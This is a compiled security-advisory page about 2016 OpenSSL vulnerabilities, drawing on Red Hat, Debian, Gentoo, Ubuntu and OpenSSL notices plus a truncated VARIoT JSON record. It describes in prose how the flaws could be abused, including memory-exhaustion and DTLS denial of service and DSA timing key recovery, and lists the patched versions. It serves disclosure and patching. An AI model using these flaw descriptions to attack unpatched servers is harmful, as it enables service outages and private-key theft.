x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201608-0006", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, 